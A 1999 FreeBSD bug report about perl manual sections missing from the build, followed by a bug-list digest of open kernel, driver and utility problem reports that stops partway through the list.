>Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Nov 1 10:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andy Farkas >Release: 3.3-STABLE, 4.0-CURRENT >Organization: Speednet Communications Pty Ltd >Environment: >Description: 'man perl' mentions three sections: perlopentut, perlreftut, and perlthrtut, but they are not built/installed by 'make world'. It looks like they were left out on purpose. Why? >How-To-Repeat: man perlopentut >Fix: Either the man page for perl should be changed, or the makefiles in src/gnu/usr.bin/perl/pod/* should include the missing sections. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Nov 1 11: 1: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BB79E14DAF for ; Mon, 1 Nov 1999 11:00:15 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA17662 for freebsd-bugs@freebsd.org; Mon, 1 Nov 1999 11:00:08 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 1 Nov 1999 11:00:08 -0800 (PST) Message-Id: <199911011900.LAA17662@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1996/12/20] bin/2258 wollman route add/delete [network] xxx.yyy.zzz.0 o [1997/03/08] kern/2923 panic: vm_fault: fault on nofault entry, o [1997/07/03] kern/4021 peter Local mount of a local NFS exported direc o [1997/07/31] kern/4200 peter NFS: "vm_fault: fault on nofault entry" w o [1997/10/01] kern/4673 Two panics, now crash dumps, always in re o [1997/11/10] kern/4996 peter NFS crash, possibly related to file bigge o [1997/11/24] bin/5139 sheldonh portmap does not find interfaces correctl f [1997/12/21] kern/5355 Fix for NULLFS problems o [1998/02/03] kern/5641 peter running processes at the IDLE priority (i o [1998/02/10] kern/5703 CDROM Media Error triggers complete syste o [1998/03/23] bin/6121 peter gethostbyname(3) no longer returns NO_DAT s [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/06/23] kern/7028 Panic in vinvalbuf when appending/looking o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/08/15] kern/7622 Kernel panic with Fatal trap 18. f [1998/09/03] kern/7822 n_hibma Machine Reboots without reason o [1998/09/06] kern/7843 Unable to install FreeBSD on Tekram DC-39 o [1998/09/08] i386/7859 luigi fatal trap 12 in midi_synth_input f [1998/09/14] kern/7927 n_hibma Fatal trap 12: page fault while in kernel o [1998/09/28] kern/8074 se CAM rescan operation fatal o [1998/10/03] gnu/8138 peter gcc -pipe xxx.s hangs f [1998/10/06] i386/8179 Install failure with motherbord using SIS f [1998/10/08] i386/8214 n_hibma Install 3.0-19981006-BETA fails f [1998/11/04] conf/8576 n_hibma server goes down when client mount its fi a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails f [1998/11/12] i386/8673 bug in vm_page_alloc_contig() o [1998/11/24] bin/8829 bug in innetgr (was: Fix port: security/s f [1998/11/25] kern/8861 n_hibma under heavy (multi interface) traffic ep0 f [1998/12/09] kern/9036 Boot 3.0-Release hangs with BT-445S after a [1999/01/05] kern/9334 n_hibma cp fails for 2048 Bytes/sector media a [1999/01/26] i386/9709 n_hibma Kernel page faults during boot with 2GB R o [1999/01/27] kern/9742 tx driver for smc autodetects fine, but n o [1999/02/02] misc/9885 BIND 8.1.2 core dumping o [1999/02/04] kern/9909 Writing incomplete blocks to /dev/nrst0 h o [1999/02/19] kern/10166 panic during heavy sio i/o;no coproc; ves o [1999/02/20] kern/10172 panic: cannot allocate pipe - out of kvm a [1999/02/21] i386/10188 n_hibma Cannot get system to boot after Installti o [1999/02/23] kern/10224 panic: pipeinit: cannot allocate pipe -- s [1999/02/26] kern/10281 Crash of 3.1-STABLE system due to scsi er o [1999/02/26] i386/10282 PCMCIA problems in 3.1-RELEASE? o [1999/03/01] kern/10332 gibbs System freezes during certain SCSI activi o [1999/03/01] bin/10344 fenner Core dump in gethostbyaddr for 199.93.70. o [1999/03/05] kern/10397 3.1R page fault while in kernel mode, fro o [1999/03/07] misc/10473 Incorrect aout compat libraries in XF8633 o [1999/03/09] kern/10507 Process hangs in state VM pgd o [1999/03/09] misc/10509 Cvs can hang system when used with pserve o [1999/03/09] kern/10520 can't exec files under nullfs o [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 When a fork/exec stress test is run, the o [1999/03/12] misc/10566 obrien patch dhcpc problem on /etc/pccard_ether o [1999/03/17] kern/10636 ipfw problems o [1999/03/19] i386/10683 I have a buslogic BT-948 FW controller. W o [1999/03/20] i386/10690 Installation freezes after device selecti f [1999/03/20] kern/10701 ppbus printing problems o [1999/03/22] ports/10725 stb Wrong Cyrus IMAP deliver group o [1999/03/23] bin/10744 call to login() from aout/libutil.so.2.2 o [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/29] kern/10866 ahc2740 panic o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi o [1999/04/05] kern/10959 3.1-STABLE crashes due to a floppy mount o [1999/04/05] ports/10965 obrien lcc-3.6 unable to compile anything o [1999/04/08] kern/11023 Synchronous PPP not functional in leased o [1999/04/13] kern/11112 Amanda on FreeBSD can wipe the _next_ tap o [1999/04/16] kern/11180 boot of fresh bsd3.1 hangs o [1999/04/17] kern/11196 n_hibma kernel mode page fault o [1999/04/19] misc/11216 Power fail versus Fsck changed my life. o [1999/04/19] kern/11226 Invalid files on disk after fsync o [1999/04/20] kern/11238 Synchronous PPP not functional in leased o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/04/22] i386/11278 FreeBSD Version 3.1 reboots repeatedly (c o [1999/04/23] i386/11298 Enabling IDE DMA on Opti Viper-M crashes o [1999/04/26] kern/11330 page fault in generic_bzero o [1999/04/26] conf/11343 worm; problems with installation and boot o [1999/04/26] i386/11349 Error Mounting /dev/wd0s1 on dist during o [1999/04/27] kern/11351 system reboot for error with popper and d o [1999/05/01] kern/11434 can't boot from wd0s2a a [1999/05/03] kern/11470 dillon V3 NFS problem o [1999/05/04] i386/11488 Error while starting FreeBSD o [1999/05/10] kern/11629 File descriptor table sharing is broken o [1999/05/12] kern/11680 server freezes, all processes stuck in "i o [1999/05/13] i386/11681 gibbs Adaptec 2940 UW SCSI Controller BIOS 1.34 o [1999/05/14] kern/11707 ncr isn't recognized in 3.1-19990512-STAB f [1999/05/17] bin/11744 perllib fails to build o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/31] kern/11966 TCP copies send and receive socket buffer f [1999/06/01] kern/11984 pthread_kill cannot kill select() threads o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br o [1999/06/02] kern/11993 panic: getnewbuf: inconsistent EMPTY queu f [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/06] conf/12050 No /sbin/init on fixit flop o [1999/06/07] kern/12072 vm_fault happened in binary file transfer o [1999/06/09] ports/12098 se KDM not config'd properly o [1999/06/09] kern/12106 error 6: panic: cannot mount root o [1999/06/10] kern/12127 persistent crash on idle SMP system o [1999/06/15] kern/12233 Fvwm2 causes FreeBSD-current to hang or r o [1999/06/16] bin/12243 NFS re-mount from Solaris 7 server hangs o [1999/06/16] kern/12248 CRON in malloc(): warning: pointer to wr o [1999/06/18] i386/12286 Segmentation violation when invoking JNI s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] misc/12390 Installation hangs during extraction o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG f [1999/07/20] misc/12720 gdbm (And possibly other libraries in /us o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/07/21] misc/12743 Cannot boot the 3.2 floppies o [1999/07/23] i386/12777 jkh 3.1 RELEASE -> 3.2 upgrade is incomplete, o [1999/07/26] bin/12819 billf tcpd hosts.[allow|deny] location inconsis o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/04] kern/12980 NetGear Dec 21140AF Ethernet Card unrecog o [1999/08/06] bin/12998 des still inetd junk pointer too low to make o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [1999/08/11] kern/13075 signal is not posted for async I/O on raw a [1999/08/20] kern/13270 dillon NFS hangs if written through self-mount o [1999/08/23] alpha/13338 alpha panic: pmap_remove_all: pv_table for 162b o [1999/08/24] kern/13352 No support for Promise Ultra/66 o [1999/08/30] misc/13474 Maximum Number of IPs Permitted in the .. o [1999/09/07] bin/13615 awk corrupts the memory arena when OFMT i o [1999/09/09] alpha/13653 alpha panic: pmap_remove_all: pv_table for 90b6 o [1999/09/12] kern/13709 panic: sched_sync: fsync failed o [1999/09/17] i386/13797 SMP/NFS panics on 3.3-RC o [1999/09/18] i386/13802 freebsd 3.3 fails to boot with irq proble o [1999/09/19] i386/13817 system reboot o [1999/09/19] kern/13825 tx0 "holds" packets for long periods, eve o [1999/09/19] i386/13844 keyboard locks up when I page through a m f [1999/09/20] i386/13849 grog dump on vinum r5 freezes system o [1999/09/22] i386/13892 Kern.flp does not boot on Compaq Presario o [1999/09/24] i386/13933 nfs server panics in tulip_rx_intr() o [1999/09/24] kern/13940 Panic with dd on block/"cooked" devices u o [1999/09/24] kern/13944 ATAPI cd-rom not boot to install, nor de o [1999/09/27] misc/13995 Full duplex mode doesn't work right with o [1999/09/28] kern/14028 ATAPI cd-rom not boot to install and can' o [1999/09/28] i386/14030 imp aha0 probe fails 3.3.0-RELEASE install wi o [1999/10/05] kern/14141 3.3-RELEASE crashing often o [1999/10/05] ports/14154 obrien xwpe is not completely compiled o [1999/10/06] kern/14162 sudden reboot problem ( maybe kernel pani o [1999/10/08] misc/14204 error 6: panic: cannot mout root(2) o [1999/10/08] ports/14205 se kde lock screen can't verify passwd o [1999/10/10] i386/14256 System doesn't boot under FreeBSD 3.2 o [1999/10/14] kern/14322 mount respects permissions of underlying o [1999/10/15] kern/14347 kdump & truss won't compile because addit o [1999/10/17] i386/14373 Error while booting from floppy disk o [1999/10/24] i386/14492 FreeBSD won't install/work with an Asus S o [1999/10/26] kern/14547 FreeBSD 3.3 box repeated crashes o [1999/10/27] bin/14568 page fault while using 'dagrab' o [1999/10/28] i386/14576 Ctrl+Alt+Space causes kernel panic o [1999/10/29] i386/14594 Get EXIT ON SIGNAL 8 FLOATING POINT EXCEP o [1999/10/30] kern/14614 VM DoS attack (with exploit attached) o [1999/10/31] pending/14640gnats-adminError in original Makefile 151 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- a [1995/03/20] kern/260 davidg msync and munmap don't bother to update m o [1995/10/18] bin/786 wpaul Problem with NIS and large group maps f [1996/05/26] kern/1256 ZNYX 314 mysterously looses packets o [1996/06/07] kern/1301 davidg DEC FDDI/PCI Adapter: halt code = 6 (DMA f [1996/08/03] bin/1461 Incorrect address binding of Kerberized r o [1996/08/22] kern/1533 Machine can be panicked by a userland pro o [1996/09/29] kern/1689 wollman TCP extensions throttles distant connecti o [1996/10/04] kern/1726 panic in kmem_malloc (dump available) o [1996/10/08] kern/1744 peter run queue or proc list smashed 4 times in f [1996/10/21] kern/1856 peter read-only nfs mount: panic leaf should be s [1996/10/26] bin/1892 n_hibma install(1) removes target file s [1996/11/08] gnu/1981 ypserv handles null key incorrectly a [1996/11/14] kern/2014 sos Console keyboard lockup problem o [1996/11/18] kern/2053 peter de0 driver don't work at 100M for Compex o [1996/12/22] kern/2270 Hayes ESP serial card locks system as of a [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA f [1997/01/09] bin/2430 grog mountd stops on loading if subnet mask is a [1997/01/21] bin/2549 sos cdcontrol refuses to play audio CDs from s [1997/02/03] kern/2647 changing existing route to -static crashe o [1997/02/05] kern/2667 wollman bpfattach can hang the system a [1997/02/06] kern/2675 lkmcioctl() is not consistent and careful o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/08] kern/2695 sio1 (16540 serial port) is not recognize o [1997/02/09] kern/2698 After rewind I cannot read a tape; blocks o [1997/02/12] kern/2719 added support for magneto-optical SCSI di o [1997/02/15] kern/2742 panic: leaf should be empty o [1997/02/15] bin/2747 davidn cannot submit at jobs from within an at j o [1997/02/16] gnu/2749 peter cvs export using remote cvs fails - CVS/T o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/19] bin/2769 fsck needs several runs to clean up bad/d o [1997/02/19] kern/2770 panic: vm_fault: fault on nofault entry o [1997/02/19] kern/2771 panic: bad dir o [1997/02/19] kern/2773 peter bad dir panic o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable o [1997/02/20] gnu/2786 gcc version 2.7.2.1 C compiler slows down o [1997/02/22] kern/2800 DDS large data writing probrem o [1997/03/01] kern/2840 mlock+minherit+fork+munlock causes panics o [1997/03/03] kern/2858 peter FreeBSD NFS client can't mount filesystem o [1997/03/04] kern/2873 the od0 devies does not handle a Maxoptix o [1997/03/08] kern/2919 vm_fault: fault on nofault entry, addr: f o [1997/03/11] bin/2948 can't dump 640MB optical disks o [1997/03/12] kern/2965 st0 hang/fail on reading 4mm DAT tape for o [1997/03/15] kern/2991 RTF_LLINFO routes remain when interface i o [1997/03/18] kern/3021 panic after sync during reboot o [1997/03/21] bin/3055 umount -f does not work o [1997/04/01] bin/3170 vi freaks and dump core if user doesn't e o [1997/04/05] kern/3201 peter de0 not re-enabled after hub down o [1997/04/06] kern/3216 panic: pmap_zero_page: CMAP busy o [1997/04/06] kern/3219 sppp or arnet gets looped after connectio o [1997/04/15] bin/3305 Can't do encrypted rlogin into self o [1997/04/25] kern/3381 peter 2.2.x kernel panic on traversing and remo o [1997/04/25] kern/3384 telldir-seekdir can cause livelock o [1997/05/01] gnu/3441 obrien C++ exceptions don't work in shared libra o [1997/05/01] kern/3463 netstat -I packet count increase on sl0 w f [1997/05/04] i386/3502 Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/05/07] kern/3527 peter if_de.c doesn't recognize Kingston card p o [1997/05/09] kern/3564 using MPU401 driver pagefaults kernel o [1997/05/09] kern/3569 ex0 driver doesn't work with EtherExpress o [1997/05/12] kern/3579 peter de driver doesn't support newer SMC 9332 o [1997/05/12] kern/3581 intermittent trap 12 in lockstatus() o [1997/05/12] kern/3582 panic: bad dir (mangled entry) in 2.2-STA s [1997/05/25] kern/3685 [PATCH] panic: fdesc attr o [1997/05/30] kern/3726 peter process hangs in 2.2-stable when working o [1997/05/30] kern/3727 SCSI II tape support broken o [1997/06/03] kern/3771 NFS hangs when writing to local FS re-mou o [1997/06/04] i386/3779 changing cursor to blinking block causes o [1997/06/08] gnu/3810 cvs can't handle multiple multiple-path d o [1997/06/18] kern/3899 df while unmounting floppy crashes 2.2.2 o [1997/06/19] kern/3909 joerg A patch supporting some new worm drivers o [1997/06/19] gnu/3910 sort(1) of 2.2.1R doesn't work in special o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/06/29] bin/3986 rdist seg faults when target machine is d o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f o [1997/07/02] misc/4013 boot floppy hangs if IDE ZIP Drive presen s [1997/07/06] gnu/4042 gdb stackframe in static library shows no o [1997/07/12] bin/4078 sos Typed password to log in on console and i o [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/26] bin/4176 restore gets confused when run over pipe f [1997/07/27] ports/4179 fenner lmbench-1.1 dumps core after asking for m o [1997/07/28] kern/4186 peter nfsiod, panic, page fault in kernel mode o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/06] kern/4240 kernel fails to recognise 2nd serial port o [1997/08/08] conf/4252 peter sendmail doesn't use smrsh by default o [1997/08/10] kern/4260 EOF handling in st(4) is broken o [1997/08/10] kern/4265 Panic in dsinit when multiple FreeBSD sli o [1997/08/10] kern/4270 ch driver does not use bounce buffers o [1997/08/12] kern/4284 le0 goes OACTIVE after some time o [1997/08/13] kern/4295 SL/IP difficulties between 2.2.1 & 2.2.2 o [1997/08/16] kern/4312 arp table gets messed up, syslog "gateway o [1997/08/17] kern/4327 peter NFS over TCP reconnect problem s [1997/08/19] kern/4338 New device driver (Cyclades Cyclom-Z) o [1997/08/22] bin/4357 wosch bug in adduser script causes duplicate UI o [1997/08/25] kern/4381 mount -t msdos causes panic:vm_fault o [1997/09/02] kern/4454 X drops characters/locks up keyboard when o [1997/09/03] bin/4460 lpd hangs exiting (IE in ps table) o [1997/09/10] kern/4508 peter nfs3 data integrity problems o [1997/09/11] kern/4513 System lockup appears to be VM related. o [1997/09/14] i386/4533 Server with Cyclom-Y PCI card rebooted at o [1997/09/20] kern/4588 peter NFS access locks up o [1997/09/21] kern/4600 peter nfs lookups might give incorrect result o [1997/09/30] kern/4663 checkalias panic o [1997/10/01] kern/4666 dfr umount -f doesn't seem to work o [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/03] bin/4683 imp restore doesn't correctly handle "sparse" o [1997/10/05] docs/4691 no documentation for mk_cmds(1) o [1997/10/16] kern/4774 trying to use IBCS2 shared libraries cras o [1997/10/16] kern/4782 Under certain conditions, several krsh's o [1997/10/31] kern/4909 de ethernet driver is crazy on 100base o [1997/11/01] bin/4913 peter Large mail messages can cause mail.local o [1997/11/03] kern/4927 kernel does not check any quota and permi o [1997/11/05] kern/4945 continued failure to use the Adaptec 1460 o [1997/11/05] bin/4949 rpc.rquotad stat()s fs with quota file in o [1997/11/09] kern/4990 peter NFS hangs under FastEthernet. 1024 Bytes o [1997/11/15] conf/5062 login.access not evaluated correctly a [1997/11/18] bin/5084 ru wrong "term" for internal shell o [1997/11/18] kern/5085 System crash during mount command for CD o [1997/11/22] gnu/5126 C++ compiler bug (assembly output) o [1997/11/23] i386/5128 Adaptec 2940U Timeouts with QUANTUM disk o [1997/12/06] kern/5244 F00F workaround dosn't always work on SMP s [1997/12/14] bin/5297 make incompatibility with System V style o [1997/12/19] kern/5347 peter DEC (de0) ethernet card has no buffers af o [1997/12/30] kern/5396 fdesc fs crashes system o [1997/12/31] i386/5401 peter de0 selects wrong media when reconnected f [1998/01/08] kern/5456 After writing more than 100MB to SCSI Exa o [1998/01/16] kern/5513 luigi new PnP code is BAD (soundcards) s [1998/01/19] kern/5522 [PATCH] ip_input.c & ip_output.c problems o [1998/01/26] misc/5574 bootpd gets timezone incorrectly o [1998/01/27] kern/5587 session id gets dropped o [1998/01/29] kern/5598 Support for magneto-optic SCSI devices wi s [1998/01/30] bin/5604 setenv(3) function has memory leak, other o [1998/01/31] kern/5611 bind does not check sockaddr->sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/01] kern/5624 dumping to tape causes scsi bus reset o [1998/02/04] kern/5643 NCR 810/815 do not handle rewind correctl o [1998/02/09] bin/5693 hoek groff -mm or groff -mmm ??? o [1998/02/10] i386/5698 des LPIP causes spurious reboots o [1998/02/12] kern/5728 peter NFS hangs o [1998/02/12] kern/5731 peter executables wedge on "vmopar" when built o [1998/02/17] gnu/5767 man leaves partially formatted cat pages o [1998/02/19] kern/5794 Kernel Panic f [1998/02/27] bin/5867 peter pppd or FreeBSD ? o [1998/02/28] kern/5877 sb_cc counts control data as well as data o [1998/03/01] kern/5890 peter NFS server Side say NFSERR_BAD_COOKIE (rm o [1998/03/09] bin/5959 Cannot set up clocal gettys o [1998/03/10] kern/5969 non-root user can reboot/lock up system o [1998/03/11] kern/5975 can't boot freebsd: fatal trap12: page fa o [1998/03/14] conf/6002 peter /etc/mail/sendmail.cf.addtions seems to l o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 lnc driver does not work correctly with A o [1998/03/22] i386/6099 des LPIP to slow machine causes hang o [1998/03/22] kern/6103 panic: ffs_valloc: dup alloc o [1998/03/28] bin/6162 kinit does not default to the current use o [1998/04/03] kern/6203 kernel panics with "blkfree: freeing free o [1998/04/03] conf/6205 NFS/NIS freak out o [1998/04/04] kern/6212 Two bugs with MFS filesystems fixed, one o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 o [1998/04/08] kern/6251 peter ktrace very broken when logging over NFS o [1998/04/08] kern/6252 ide cdrom hangs system when on same bus a o [1998/04/09] kern/6253 Atapi wait for command phase too short. o [1998/04/10] kern/6267 dg panic: pmap_dispose_proc: upage already m o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/17] kern/6336 peter NFSv3 should support files >2GB, but does o [1998/04/18] kern/6344 cy driver is outdated o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using o [1998/04/22] bin/6383 csh - when ctrl-d is pressed, file is chm o [1998/04/25] kern/6412 peter NFS sends packets from the wrong interfac o [1998/05/03] kern/6506 system will not soft reboot f [1998/05/05] kern/6525 Coral-Draw 5 CD crashes 2.2.6-STABLE a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/08] bin/6557 /bin/sh is broken o [1998/05/10] bin/6577 /bin/sh environment variables not set in o [1998/05/11] ports/6591 se KDE starts /usr/bin/kzip instead of /usr/ o [1998/05/12] kern/6603 ncr driver hangs under high load o [1998/05/12] bin/6609 gmp.h not installed o [1998/05/17] kern/6670 PANIC on boot with FreeBSD 3.0 (same comp s [1998/05/19] kern/6686 [STABLE] -stable does not support large I o [1998/05/20] kern/6706 mount_msdos+mount_null+mc=panic o [1998/05/25] kern/6751 audio cd play suddenly stops. o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current o [1998/05/27] kern/6771 peter panic: Bad nfs svc reply s [1998/05/27] misc/6773 [PATCH] tempnam.c security problems o [1998/06/01] misc/6824 peter Intel EtherExpress 100+, 2.2.6 NFS troubl s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/04] kern/6854 [PATCH] probing brooktree849 capture card s [1998/06/04] kern/6858 inetd in realloc(): warning: junk pointer o [1998/06/04] misc/6861 [PATCH] netboot error o [1998/06/05] kern/6865 OS crashes when exiting shell with suspen o [1998/06/10] kern/6908 kernel crash from user land o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output f [1998/06/19] i386/6996 Occasional complete lockup of 2.2.5R s [1998/06/22] bin/7019 [security] pwd.db almost always contains s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] kern/7038 shimon Kernel panic caused by DPT driver (Got a s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 3Com 3C509 locks up, or has >1000ms rtt u s [1998/06/24] bin/7059 sh dumps core on this script o [1998/06/24] ports/7061 ache fspclient's grab command fails (and remov o [1998/07/05] ports/7167 ache elm cannot pgp for more than one recipien s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/05] kern/7178 sos IDE Western Digital hard disk detection e s [1998/07/06] misc/7190 jkh "Invalid partition table" after new insta s [1998/07/10] kern/7237 NCR SCSI driver ch0 troubles o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/21] conf/7354 source distribution selection bug when in f [1998/07/22] kern/7367 panic: malloc: wrong bucket o [1998/07/23] ports/7383 imp socks5 + ssh + redirection not working o [1998/07/26] kern/7405 in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 Machine crashes do not occur very often, o [1998/07/30] bin/7446 jdp Dlopen succeed in particular cases, but i o [1998/08/04] ports/7490 ache `setenv LANG/LC_CTYPE C` makes tcsh unusa s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/08/10] kern/7557 -current machine running Diablo, lockup, s [1998/08/10] kern/7561 CDROM (wcd) is prone to lock up system/pr s [1998/08/10] kern/7562 Running wine can cause other applications o [1998/08/12] bin/7587 There is no pthread_cancel() in libc_r.a! o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/18] conf/7665 sysinstall quits silently o [1998/08/19] kern/7678 Problems with a 386-16 f [1998/08/20] i386/7698 n_hibma scotty/tkined library error o [1998/08/23] kern/7727 Processes get wedged in 'getblk' on 2.2.7 o [1998/08/27] kern/7754 kernel panics if NFS server uses LKM vs. o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/09/01] kern/7797 System halted with "panic: pmap_release: o [1998/09/02] i386/7815 probe can't find wdc0 s [1998/09/03] gnu/7821 awk in free(): warning: chunk is already o [1998/09/03] conf/7823 sysinstall will not install XFree o [1998/09/09] bin/7872 [PATCH] mountd(8) can apply flags to wron o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/09] bin/7877 billf libpcap and tcpdump need updating o [1998/09/10] kern/7880 mount_cd9660 incorrect on multitrack CD-R o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/16] kern/7950 Trap 12 while executing wine o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas a [1998/09/19] ports/7987 ports Can't post news with TRN + NNTPCACHE o [1998/09/22] conf/8031 [patch] /etc/rc looks for /etc/sendmail.c o [1998/09/28] misc/8070 can't get a system with an NCR 810 contro o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/29] bin/8085 sendmail startup could be backgrounded o [1998/09/30] gnu/8099 [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can o [1998/10/05] kern/8158 sio driver breaks in 2.2.7R in kernels wi o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/07] bin/8195 ee dumps core on window resize o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/11] bin/8266 [patch] nfsd should allow just nfs versio o [1998/10/12] bin/8281 writev() in libc_r causes loop o [1998/10/13] kern/8312 Under heavy load, the system panics with o [1998/10/14] bin/8322 Mail doesn't respect REPLYTO in .mailrc o [1998/10/14] kern/8324 failure to deliver SIGIO when fildes mark o [1998/10/19] conf/8379 check_rcpt returns OK for nonexistent add o [1998/10/20] kern/8380 swap_page error: out of swap space o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/20] ports/8394 peter rdist6 won't compile--tries to use MOUNT_ o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg s [1998/10/22] kern/8417 3.0 config(8) doesn't check that root fs o [1998/10/22] i386/8418 sh MAKEDEV all - fails to create hard lin o [1998/10/23] kern/8423 Intel PILA8461 NIC panics 2.2.7 during pr o [1998/10/24] i386/8435 boot.flp does not give shell prompt after o [1998/10/28] misc/8480 odd Korean timedef(LC_TIME) o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r o [1998/11/03] i386/8567 Intel EtherExpress Pro/10 driver (if_ex.c o [1998/11/05] kern/8580 Hanging NFS pagein in nfs_bio.c (2.2.7, w o [1998/11/07] kern/8590 kernel incorrectly recognizing Maxtor 11. o [1998/11/07] kern/8596 panic: page fault while using ping's reco o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] kern/8619 EXT2FS should be in GENERIC kernel o [1998/11/08] ports/8622 peter exmh2 has problems with some date formats s [1998/11/09] misc/8623 wollman [MFC] Time zone for Japan is strange (see o [1998/11/10] bin/8646 Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device o [1998/11/11] kern/8657 nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/12] kern/8669 aio_write() and aio_read() do not work AT o [1998/11/14] kern/8683 sos Problems with Atapi in 3.0... o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/17] 